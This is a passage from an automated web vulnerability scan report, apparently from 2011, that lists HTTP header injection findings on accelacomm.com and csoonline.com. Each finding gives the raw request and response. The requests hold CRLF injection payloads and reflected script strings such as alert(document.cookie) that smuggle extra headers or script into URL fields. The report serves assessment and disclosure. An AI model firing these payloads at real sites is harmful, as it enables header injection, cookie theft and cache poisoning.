Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=csozne&Source_BC=ae914
68002f8ad7d&Script=/LP/50552781/reg&_from=cf4cf
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 444

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.3. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cf4cf [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.accelacomm.com
Path:	/jlp/csozne/10/50552781/_from=cf4cf

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 2063a%0d%0a72bc462d3d1 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /jlp/csozne/10/2063a%0d%0a72bc462d3d1/_from=cf4cf HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cf4cf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8127f6b53d2&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Svr=svr.regwa2; regid=-105b800c:12e634a5162:-1251.90

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 14:18:19 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=csozne&Source_BC=10&Script=/LP/2063a
72bc462d3d1/reg&_from=cf4cf
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 438

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.4. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.accelacomm.com
Path:	/jlp/csozne/10/50552781/_from=cso

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d74bb%0d%0af5a30db6a7 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /jlp/d74bb%0d%0af5a30db6a7/10/50552781/_from=cso HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 12:44:46 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=d74bb
f5a30db6a7&Source_BC=10&Script=/LP/50552781/reg&_from=cso
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 437

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.5. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.accelacomm.com
Path:	/jlp/csozne/10/50552781/_from=cso

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 93f1c%0d%0a588c3c380c9 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /jlp/csozne/93f1c%0d%0a588c3c380c9/50552781/_from=cso HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 12:44:47 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=csozne&Source_BC=93f1c
588c3c380c9&Script=/LP/50552781/reg&_from=cso
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 442

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.6. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.accelacomm.com
Path:	/jlp/csozne/10/50552781/_from=cso

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 8af77%0d%0a8e0599031ac was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /jlp/csozne/10/8af77%0d%0a8e0599031ac/_from=cso HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 12:44:47 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=csozne&Source_BC=10&Script=/LP/8af77
8e0599031ac/reg&_from=cso
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 436

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.7. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso6566b' [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.accelacomm.com
Path:	/jlp/csozne/10/50552781/_from=cso6566b'

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 83165%0d%0a1558ea8fdec was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /jlp/83165%0d%0a1558ea8fdec/10/50552781/_from=cso6566b';alert(1)//04743b660f0 HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso6566b'%3balert(1)//04743b660f0&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: regid=-105b800c:12e634a5162:-1251.90; Svr=svr.regwa2

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 14:18:29 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=83165
1558ea8fdec&Source_BC=10&Script=/LP/50552781/reg&_from=cso6566b';alert(1)//04743b660f0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 466

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.8. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso6566b' [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.accelacomm.com
Path:	/jlp/csozne/10/50552781/_from=cso6566b'

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload e8db0%0d%0a7561719fcc6 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /jlp/csozne/e8db0%0d%0a7561719fcc6/50552781/_from=cso6566b';alert(1)//04743b660f0 HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso6566b'%3balert(1)//04743b660f0&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: regid=-105b800c:12e634a5162:-1251.90; Svr=svr.regwa2

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 14:18:30 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=csozne&Source_BC=e8db0
7561719fcc6&Script=/LP/50552781/reg&_from=cso6566b';alert(1)//04743b660f0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 470

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.9. http://www.accelacomm.com/jlp/csozne/10/50552781/_from=cso6566b' [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.accelacomm.com
Path:	/jlp/csozne/10/50552781/_from=cso6566b'

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 3a18b%0d%0af41f723f100 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /jlp/csozne/10/3a18b%0d%0af41f723f100/_from=cso6566b';alert(1)//04743b660f0 HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso6566b'%3balert(1)//04743b660f0&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: regid=-105b800c:12e634a5162:-1251.90; Svr=svr.regwa2

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 14:18:31 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=csozne&Source_BC=10&Script=/LP/3a18b
f41f723f100/reg&_from=cso6566b';alert(1)//04743b660f0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 464

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.10. http://www.accelacomm.com/jlp/csoznee4778' [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.accelacomm.com
Path:	/jlp/csoznee4778'

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 3a711%0d%0af5e77a50fc3 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /jlp/3a711%0d%0af5e77a50fc3;alert(1)//c8ec899850f/10/50552781/_from=cso HTTP/1.1
Host: www.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso&src=csoznee4778'%3balert(1)//c8ec899850f&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: regid=-105b800c:12e634a5162:-1251.90; Svr=svr.regwa2; __utma=192604602.318667683.1298902742.1298902742.1298902742.1; __utmb=192604602; __utmc=192604602; __utmz=192604602.1298902742.1.1.utmccn=(referral)|utmcsr=zones.computerworld.com|utmcct=/ncircle/registration.php|utmcmd=referral

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Feb 2011 14:18:44 GMT
Server: Apache/2.2.9 (Fedora)
Location: http://reg.accelacomm.com/servlet/Frs.frs?Context=LOGENTRY&Source=3a711
f5e77a50fc3;alert(1)&Source_BC=&Script=/LP/c8ec899850f/reg&10/50552781/_from=cso
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 460

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://reg.accelacomm.c
...[SNIP]...

2.11. http://www.csoonline.com/article/486324 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/article/486324

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload a1f89%0d%0a768de21f1d5 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /article/486324?a1f89%0d%0a768de21f1d5=1 HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.1.10.1298897096; NSC_djp.dpn=44593ca03660; s_pers=%20s_pv%3DCSO%2520nCircle%2520Solution%2520Center%7C1298898968728%3B; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D43%3B%20SC_LINKS%3DCSO%2520nCircle%2520Solution%2520Center%255E%255ETools%2520%2526%2520Templates%255E%255ECSO%2520nCircle%2520Solution%2520Center%2520%257C%2520Tools%2520%2526%2520Templates%255E%255ENav%253AMain%3B%20s_sq%3Dcsoonlinecom%253D%252526pid%25253DCSO%25252520nCircle%25252520Solution%25252520Center%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.csoonline.com/article/486324%252526ot%25253DA%3B

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 12:46:15 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/article/486324/security-tools-templates-policies?a1f89
768de21f1d5=1
Content-Length: 132
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:01:57 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/article/486324/security-tools-templates-policies?a1f89
768de21f1d5=1">here</a>

2.12. http://www.csoonline.com/webcast/603308/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/webcast/603308/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload c1609%0d%0aae951e02a5c was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/603308/?c1609%0d%0aae951e02a5c=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:27 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/603308/utility-mandate-software-security-for-the-smart-grid?c1609
ae951e02a5c=1
Content-Length: 151
Keep-Alive: timeout=5, max=18
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:07 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/603308/utility-mandate-software-security-for-the-smart-grid?c1609
ae951e02a5c=1">here</a>

2.13. http://www.csoonline.com/webcast/626992/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/webcast/626992/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload b38a5%0d%0ab593df67fa6 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/626992/?b38a5%0d%0ab593df67fa6=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:28 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/626992/60-minutes-the-future-of-the-perimeter?b38a5
b593df67fa6=1
Content-Length: 137
Keep-Alive: timeout=5, max=36
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:08 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/626992/60-minutes-the-future-of-the-perimeter?b38a5
b593df67fa6=1">here</a>

2.14. http://www.csoonline.com/webcast/636963/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/webcast/636963/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload ad048%0d%0ab80f3f9cfef was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/636963/?ad048%0d%0ab80f3f9cfef=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:24 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/636963/expert-webcast-defend-your-mobile-data?ad048
b80f3f9cfef=1
Content-Length: 137
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:04 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/636963/expert-webcast-defend-your-mobile-data?ad048
b80f3f9cfef=1">here</a>

2.15. http://www.csoonline.com/webcast/646474/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/webcast/646474/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 58396%0d%0a94bbc6213b0 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/646474/?58396%0d%0a94bbc6213b0=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:24 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/646474/on-demand-webinar-2010-threat-report?58396
94bbc6213b0=1
Content-Length: 135
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:04 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/646474/on-demand-webinar-2010-threat-report?58396
94bbc6213b0=1">here</a>

2.16. http://www.csoonline.com/webcast/647171/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/webcast/647171/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 1b429%0d%0a24c03876611 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/647171/?1b429%0d%0a24c03876611=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:24 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/647171/whose-data-is-it-anyway-?1b429
24c03876611=1
Content-Length: 123
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:05 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/647171/whose-data-is-it-anyway-?1b429
24c03876611=1">here</a>

2.17. http://www.csoonline.com/webcast/647466/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/webcast/647466/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 4687f%0d%0a7d4e137520b was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/647466/?4687f%0d%0a7d4e137520b=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; MetrixLabp10833_master=1; __unam=db592fa-12e6c4e2ed5-37f53805-1; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __utmc=209317120; __utmb=209317120.2.10.1298897096; NSC_djp.dpn=44593cbe3660;

Response

HTTP/1.1 302 Found
Date: Mon, 28 Feb 2011 13:35:24 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Location: http://www.csoonline.com/webcast/647466/the-insider-threat-understand-and-mitigate-your-risks?4687f
7d4e137520b=1
Content-Length: 152
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_djp.dpn=44593cbe3660;expires=Mon, 28-Feb-11 13:51:05 GMT;path=/

The URL has moved <a href="http://www.csoonline.com/webcast/647466/the-insider-threat-understand-and-mitigate-your-risks?4687f
7d4e137520b=1">here</a>

2.18. http://www.csoonline.com/webcast/653065/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/webcast/653065/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d57a1%0d%0a0a7a5387037 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /webcast/653065/?d57a1%0d%0a0a7a5387037=1 HTTP/1.1
Host: www.csoonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
